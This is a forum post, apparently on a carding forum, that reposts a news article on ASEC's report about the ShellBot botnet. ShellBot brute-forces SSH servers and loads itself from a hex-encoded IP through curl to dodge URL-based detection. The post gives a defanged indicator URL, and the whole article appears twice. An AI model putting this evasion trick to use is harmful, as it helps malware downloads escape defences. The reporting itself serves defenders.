Carding 4 Carders
Professional
- Messages
- 2,724
- Reaction score
- 1,588
- Points
- 113
Malicious code penetrates deeper and deeper, bypassing standard security measures.
The attackers behind the ShellBot botnet use IP addresses converted to hexadecimal notation to break into vulnerable Linux SSH servers and deploy malware there to conduct DDoS attacks.
A new report published today by AhnLab Security (ASEC) says: "The general order of actions of hackers remains the same, but the download URL used by attackers to install ShellBot has changed from a normal IP address to a hexadecimal value."
ShellBot, also known as PerlBot, breaches the security of servers with weak SSH data through a dictionary attack. This malicious code is used to organize DDoS attacks and deliver cryptocurrency miners.
Developed in Perl, the malicious botnet code uses the IRC protocol to communicate with the C2 command and control server.
Recent observed attacks using ShellBot install malware using hexadecimal IP addresses. For example, a communication channel is created for the IP address "hxxp://0x2763da4e/", which corresponds to the address "hxxp://39.99.218.78".
This connection method works correctly and does not cause detections, so we can conclude that hackers came up with this trick intentionally to bypass URL-based detection.
ASEC emphasizes: "By using curl for loading and its ability to support hexadecimal addresses, similar to web browsers, ShellBot can be successfully loaded in a Linux environment and executed via Perl."
Such development of the malware is a sign that ShellBot continues to be actively used for cyber attacks on Linux systems. And since ShellBot can be used to install additional malware or launch various types of attacks from a compromised server, we recommend using strong passwords and changing them regularly.
Earlier, ASEC specialists uncovered a malicious operation using non-standard certificates with unusually long strings for the "Subject Name" and "Publisher Name" fields to distribute malware designed to steal information — Lumma Stealer and RecordBreaker.
Returning to ShellBot, we can say that the considered campaign is a reminder that standard detection mechanisms can be easily circumvented by malicious tricks, such as replacing classic IP addresses with hexadecimal values.
All of this underscores the need for continued development of the cybersecurity industry, increased attention to detail, and readiness to adapt to the ever-changing attack landscape.
The attackers behind the ShellBot botnet use IP addresses converted to hexadecimal notation to break into vulnerable Linux SSH servers and deploy malware there to conduct DDoS attacks.
A new report published today by AhnLab Security (ASEC) says: "The general order of actions of hackers remains the same, but the download URL used by attackers to install ShellBot has changed from a normal IP address to a hexadecimal value."
ShellBot, also known as PerlBot, breaches the security of servers with weak SSH data through a dictionary attack. This malicious code is used to organize DDoS attacks and deliver cryptocurrency miners.
Developed in Perl, the malicious botnet code uses the IRC protocol to communicate with the C2 command and control server.
Recent observed attacks using ShellBot install malware using hexadecimal IP addresses. For example, a communication channel is created for the IP address "hxxp://0x2763da4e/", which corresponds to the address "hxxp://39.99.218.78".
This connection method works correctly and does not cause detections, so we can conclude that hackers came up with this trick intentionally to bypass URL-based detection.
ASEC emphasizes: "By using curl for loading and its ability to support hexadecimal addresses, similar to web browsers, ShellBot can be successfully loaded in a Linux environment and executed via Perl."
Such development of the malware is a sign that ShellBot continues to be actively used for cyber attacks on Linux systems. And since ShellBot can be used to install additional malware or launch various types of attacks from a compromised server, we recommend using strong passwords and changing them regularly.
Earlier, ASEC specialists uncovered a malicious operation using non-standard certificates with unusually long strings for the "Subject Name" and "Publisher Name" fields to distribute malware designed to steal information — Lumma Stealer and RecordBreaker.
Returning to ShellBot, we can say that the considered campaign is a reminder that standard detection mechanisms can be easily circumvented by malicious tricks, such as replacing classic IP addresses with hexadecimal values.
All of this underscores the need for continued development of the cybersecurity industry, increased attention to detail, and readiness to adapt to the ever-changing attack landscape.
